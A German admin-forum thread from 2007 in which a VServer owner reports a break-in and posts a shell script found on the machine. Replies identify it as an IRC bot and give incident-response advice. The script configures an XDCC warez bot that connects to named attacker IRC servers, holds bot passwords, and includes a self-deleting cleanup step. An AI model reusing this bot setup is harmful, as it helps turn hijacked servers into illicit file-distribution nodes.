Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

VServer als Fileserver benutzt

Frage Internet Server

Mitglied: Esche2007

Esche2007 (Level 1) - Jetzt verbinden

06.05.2007, aktualisiert 12.05.2007, 6797 Aufrufe, 9 Kommentare

Hi,
hoffe Ihr könnt mir helfen.
Ich habe seit kurzem einen VServer bei Strato, dieser wurde von irgendwelchen Kiddies gehackt und als Fileserver benutzt. Habe schon die Pfade raus bekommen, wo diese sachen liegen.
So wie ich das jetzt sehe haben die ein Script ausgeführt (Dummerweise war mein SafeMode off) und somit die Files hochgeladen.

In meiner Log Datei habe ich folgende Logs gefunden.

Mar 30 15:49:52 h8xxxxx proftpd[6076]: h8xxxxx.serverkompetenz.net (85.xx.xx.xx[85.xx.xxx.xx])) - no such user 'web5'
Mar 30 15:49:52 h8xxxxx proftpd[6076]: h8xxxxx .serverkompetenz.net (85.xx.xx.xx[85.xx.xxx.xx]) - USER web5: no such user found from 85.xx.xx.xx [85.xx.xx.xx] to 85.xx.xx.xx:21


Wenn ich diese Ordner lösche dann funktioniert irgendwie gar nix mehr (ssh zugang geht nicht mehr und Apache ist auch nicht mehr erreichbar)

Folgendes File hab ich noch gefunden

#!/bin/sh
echo "statefile Infodll.state" >> conf.txt;
echo "statefile mybot.state" >> conf.txt;
echo "connectionmethod direct" >> conf.txt;
echo "server franco.ns0.it 6666" >> conf.txt;
echo "server franco.ns0.it 6667" >> conf.txt;
echo "server franco.ns0.it 6668" >> conf.txt;
echo "server franco.ns0.it 6669" >> conf.txt;
echo "server franco.ns0.it 7000" >> conf.txt;
echo "server irc.toxic-power.net 6666" >> conf.txt;
echo "server irc.toxic-power.net 6667" >> conf.txt;
echo "server irc.toxic-power.net 6668" >> conf.txt;
echo "server irc.toxic-power.net 7000" >> conf.txt;
echo "channel ###r00t###" >> conf.txt;
echo "channel #toxic" >> conf.txt;
echo "channel $2" >> conf.txt;
echo "user_nick ToXiC|$1" >> conf.txt;
echo "nickserv_pass c0c41n4">> conf.txt;
echo "adminpass zSvOExY4a/k1U">>conf.txt;
echo "#local_vhost 123.456.789.123" >> conf.txt;
echo "#tcprangestart 4000" >> conf.txt;
echo "#usenatip 123.456.789.123" >> conf.txt;
echo "user_realname ...::::9ToXiC CrEw::::..." >> conf.txt;
echo "user_modes +ix" >> conf.txt;
echo "loginname ToXiC" >> conf.txt;
echo "slotsmax 10" >> conf.txt;
echo "queuesize 30" >> conf.txt;
echo "maxtransfersperperson 1" >> conf.txt;
echo "maxqueueditemsperperson 2" >> conf.txt;
echo "restrictlist yes" >> conf.txt;
echo "restrictprivlist yes" >> conf.txt;
echo "restrictsend yes" >> conf.txt;
echo "restrictprivlistmsg Per la lista http://ToXiCWaReZ.Altervista.Org; >> conf.txt;
echo "respondtochannelxdcc no" >> conf.txt;
echo "respondtochannellist no" >> conf.txt;
echo "headline [9T9o9X9i9C 9C9r9E9w]..::9The Best Way For Sharing::..0®" >> conf.txt;
echo "creditline [9T9o9X9i9C 9C9r9E9w]..::9The Best Way For Sharing::..0®" >> conf.txt;
echo "adminhost *!*@ToXiC.CrEw" >> conf.txt;
echo "uploadhost *!*@ToXiC.CrEw" >> conf.txt;
echo "uploadhost *!*@T.o.X.i.C" >> conf.txt;
echo "downloadhost *!*@*.*" >> conf.txt;
echo "hideos yes" >> conf.txt;
echo "filedir `pwd`" >> conf.txt;
echo "uploaddir `pwd`" >> conf.txt;
echo "#!/bin/sh">>remove;
echo "rm -rf linux.tar;rm -rf remove">>remove;
chmod 777 remove;
ls -la;

zusätzlich fande ich noch das Programm "ftpd"



Wie genau soll ich jetzt vorgehen! Die Daten sichern und zur Anzeige bringen ??

würde mich über hilfe freuen
Gruß
Esche
Mitglied: thekingofqueens
06.05.2007 um 16:23 Uhr
Wenn du wirklich vor hast zur Polizei zu gehen dann einfach den Server abschalten. Nichts verändern. Strato Bescheid sagen. Zur Polizei gehen, vorher noch Rechtsanwalt nehmen.
Bitte warten ..
Mitglied: 16568
06.05.2007 um 19:47 Uhr
PERFEKTE ANTWORT!!!


Lonesome Walker
Bitte warten ..
Mitglied: erikro
06.05.2007 um 20:00 Uhr
Hallo zusammen,

sieht aus, als hätte Dir jemand einen IRC-Bot untergejubelt.

Was heißt es geht nichts mehr wenn Du welche Ornder löschst?

Der recht spärliche Auszug aus dem log file sagt nur, dass sich ein user mit dem Namen web5 versucht hat anzumelden, was ihm nicht gelungen ist. Das kann also nichts damit zu tun haben.

Zur Staatsanwaltschaft zu laufen ist m. E. mit viel Ärger und viel Zeit verbunden. Ob's was bringt, ist die zweite Frage. Mir hat auch mal jemand eine Tauschbörse untergejubelt auf einem Server, den ich glücklicherweise gerade erst übernommen hatte und sowieso komplett neu machen sollte. Bzw. nach dem Angriff war klar, dass alles neu gemacht werden muss. Wir haben damals auf eine Anzeige verzichtet.

Allerdings hast Du spätestens jetzt Kenntnis von der Sache und musst demzufolge umgehend Gegenmaßnahmen ergreifen. Unterlässt Du das, dann steht die Staatsanwaltschaft evtl. bei Dir vor der Tür und zwar morgens um sechs und nimmt erst einmal alles mit, was irgendwie nach Computer aussieht. Das kann Dir übrigens auch passieren, wenn Du Dich doch zur Strafanzeige entschließt. Deshalb auch von mir der dringende Rat, einen Anwalt hinzuzuziehen. In Berlin und Hamburg wüsste ich einen entsprechenden Fachanwalt.

Auf jeden Fall musst Du den Prozess suchen, unter dem der Bot läuft. Weißt Du wie das geht? Was ist das denn eigentlich für ein Server? Linux, vermute ich. Welches Linux? Strato bietet afaik Suse und Debian an.

Dann musst Du den Prozess killen und suchen, ob er irgendwie automatisch gestartet wird. Ich empfehle beim suchen auch mal den Parameter forest bei ps (man ps hilft ungemein ;) )zu benutzen. Evtl. ist der eigentliche Bot-Prozess ein Kindprozess eines anderen. Evtl. ist das klug programmiert, so dass der Elternprozess den Bot erst nach einer Weile vielleicht erst nach Stunden wieder startet.

Wenn Du das nicht innerhalb kürzester Zeit gelingt, Du nicht in der Lage dazu bist oder Du Dich zu einer Strafanzeige entschließen solltest bzw. noch nicht genau weißt, ob Du das willst, dann würde ich schleunigst bei Strato anzurufen und das Ding vom Netz nehmen zu lassen.

Liebe Grüße

Erik
Bitte warten ..
Mitglied: 16568
06.05.2007 um 20:11 Uhr
Ein gut gemeinter Rat von mir:

Server sofort ausschalten, von mir aus auch abwürgen.
Verfahren dann wie von thekingofqueens vollziehen.
Gebrabbel von erik ignorieren.


Polizei ist ein MUSS!!!


Lonesome Walker
(Mod Webserver, Hacker und Co. und im Real-Life ein Mann für den Bereich Sicherheit )
Bitte warten ..
Mitglied: Esche2007
11.05.2007 um 22:46 Uhr
Hallo,
vielen Dank für die Antworten! Find ich echt super, dass man hier Hilfe bekommt (ist in vielen anderen Foren nicht so)
Hab sogar ein schlechtes Gewissen, dass ich nicht früher Antworten konnte, dies war mir jedoch nicht möglich.

Ich habe jetzt das getan, was man eigentlich nicht tun sollte. Hab alles gelöscht, Server neu aufgespielt usw....

Eigentlich habt Ihr recht, normal müsste ich zur Polizei. Ich weiß aber auch wie das mit der "möchtegern Szene" läuft und da wird gescannt und gehackt was das Zeug hält und jemanden etwas konkret nachzuweisen ist ziemlich unmöglich (auch wenn die Daten nachweisbar sind).

Wovor ich mehr Angst habe ist, dass ich bald wieder gehackt werde, denn normal werden gute Server wieder versucht "zurück zu hacken" (auch wenn das ziemlich idiotisch ist) Sollte sowas wirklich passieren werde ich aufjedenfall den rechtlichen Weg suchen.

Schönes Wochenende euch allen
Gruß

Esche
Bitte warten ..
Mitglied: 16568
12.05.2007 um 10:15 Uhr
Ich habe jetzt das getan, was man eigentlich
nicht tun sollte. Hab alles gelöscht,
Server neu aufgespielt usw....

Tja, warum antowrten wir dann überhaupt noch "Usern" wie Dir?

Eigentlich habt Ihr recht, normal
müsste ich zur Polizei. Ich weiß
aber auch wie das mit der
"möchtegern Szene" läuft
und da wird gescannt und gehackt was das Zeug
hält und jemanden etwas konkret
nachzuweisen ist ziemlich unmöglich
(auch wenn die Daten nachweisbar sind).

Darüber lache ich dann doch; denn wäre ich derjenige gewesen, der Deinen Server übernommen hat, Du hättest nicht mal was mitgekriegt (rootkit).

Wovor ich mehr Angst habe ist, dass ich bald
wieder gehackt werde, denn normal werden gute
Server wieder versucht "zurück zu
hacken" (auch wenn das ziemlich
idiotisch ist) Sollte sowas wirklich
passieren werde ich aufjedenfall den
rechtlichen Weg suchen.

Dann ist es schon zu spät, denn dann kriegst Du auch blöde Sprüche von der Polizei, warum Du nicht früher hingegangen bist.

Sag mal, warum glaubst Du, schreiben wir Dir:
Geh zur Polizei!

Aus Spaß? Weil uns langweilig ist?

Klar wird Dein Server neu penetriert werden, denn der letzte erfolgreiche Hacker wird sagen:

Der war schon einmal so blöd, der wird es wieder sein!


Das weiß auch die Polizei, und meist stellen die dann einen Honeypot auf (zumindest macht das einer von denen, die ich kenne...)

Viel Spaß mit Deinen weiteren gehackten Büchsen.
Nicht jeder ist in der Lage, mit dieser Verantwortung umzugehen.


Lonesome Walker
Bitte warten ..
Mitglied: Esche2007
12.05.2007 um 13:53 Uhr
Naja leicht reden habt Ihr...

Was soll ich sagen?
Das ist ein privater VServer.
Wie sollte denn einen Anwalt bezahlen?
Was mache ich solange mein VServer nicht läuft? (einen 2. Mieten wäre zu teuer)
Wer zahlt denn die Arbeitsausfälle die (sicherlich) entstehen werden würden

......
Bitte warten ..
Mitglied: thekingofqueens
12.05.2007 um 14:13 Uhr
Eins versteh ich nicht, der Server ist privat. Aber es entstehen Arbeitsausfälle? Was ist, wenn mit dem Server Schabernack getrieben wurde und sich nun der Anwalt eines Geschädigten an dich wendet?
Bitte warten ..
Mitglied: Esche2007
12.05.2007 um 14:18 Uhr
Eins versteh ich nicht, der Server ist
privat. Aber es entstehen
Arbeitsausfälle? Was ist, wenn mit dem
Server Schabernack getrieben wurde und sich
nun der Anwalt eines Geschädigten an
dich wendet?

hab mich etwas undeutlich ausgedrückt!
Ich bin im moment ziemlich in meiner Arbeit eingespannt und hab deshalb auch nicht wirklich zeit mich mit Polizei Anwalt etc. aueinander zu setzen..

Mit dem anderen hast du wohl recht das es dann ein Problem gibt
Bitte warten ..
Ähnliche Inhalte
Server
Unterschied HDD vServer - SSD vServer
gelöst Frage von NyradosServer4 Kommentare

Hallo liebe Community, Ich verstehe nicht ganz wo der unterschied zwischen einem HDD vServer und einem SSD vServer liegt ...

Verschlüsselung & Zertifikate
Welches Verschlüsselungsverfahren wird benutzt?
Frage von M.MarzVerschlüsselung & Zertifikate12 Kommentare

Hallo zusammen, Es gibt ja die Asymmetrische, Symmetrische und die Hybrid Varianten, woran erkenne ich welches Verschlüsselungs- Verfahren eine ...

Windows Server
Fileserver - aber wie?
Frage von iBlitzWindows Server5 Kommentare

Hallo Community, bin neu hier und hoffe auf Eure Unterstützung. Ich möchte aus einem alten Rechner eine Art Server ...

Server
Zugriff auf Vserver durch Betreiber
gelöst Frage von houdapServer18 Kommentare

Moin meine lieben, Ich habe zum Test bei Strato einen Vserver bestellt. Auf diesen kann ich per RDP von ...

Neue Wissensbeiträge
Datenschutz

Weitere Inforamtionen zum Sicherheitsproblem BeA

Information von Penny.Cilin vor 2 StundenDatenschutz

Im folgenden ein weiterer Bericht über die Sicherheitsprobleme von Bea. Fataler Konstruktionsfehler im besonderen elektronischen Anwaltspostfach Gruss Penny

Windows 10

Systemdienste behalten nach Win10 inplace-Upgrade nicht die ggf. modifizierte Startart bei

Tipp von DerWoWusste vor 4 StundenWindows 103 Kommentare

Stellt Euch vor, Ihr habt ein Win10 System und modifiziert dort die Startart von Systemdiensten. Zum Beispiel wollt Ihr ...

Microsoft Office

Deaktivieren von Startbildschirm und Backstage-Ansicht in Office 2016 per Batch-Datei

Anleitung von SarekHL vor 7 StundenMicrosoft Office17 Kommentare

Guten Morgen zusammen! Ich habe mir gestern (auch mit Hilfe dieses Boards) ein Script gebastelt, um in Office 2016 ...

Erkennung und -Abwehr

Sicherheitslücke Spectre und Meltdown: Status prüfen

Anleitung von Frank vor 13 StundenErkennung und -Abwehr2 Kommentare

Nach all den Updates der letzten Woche sollte man unbedingt auch den Status prüfen, ob die Sicherheitslücken Spectre, Meltdown ...

Heiß diskutierte Inhalte
Netzwerke
NTFS-Berechtigung
Frage von Daoudi1973Netzwerke23 Kommentare

Hallo zusammen und frohes neues Jahr (Sorry, ich bin spät dran) Meine Frage: 1- Ich habe einen Ordner im ...

Microsoft Office
Deaktivieren von Startbildschirm und Backstage-Ansicht in Office 2016 per Batch-Datei
Anleitung von SarekHLMicrosoft Office17 Kommentare

Guten Morgen zusammen! Ich habe mir gestern (auch mit Hilfe dieses Boards) ein Script gebastelt, um in Office 2016 ...

Drucker und Scanner
Gesucht DIN A3 Drucker
Frage von NebellichtDrucker und Scanner15 Kommentare

Hallo, ich möchte einen neuen DIN A3 Drucker kaufen. Um ab und zu, ca. 1 mal die Woche Farbausdrucke ...

Batch & Shell
AD-Abfrage in Batchdatei und Ergebnis als Variable verarbeiten
Frage von Winfried-HHBatch & Shell15 Kommentare

Hallo in die Runde! Ich habe eine Ergänzungsfrage zu einem alten Thread von mir. Ausgangslage ist die Batchdatei, die ...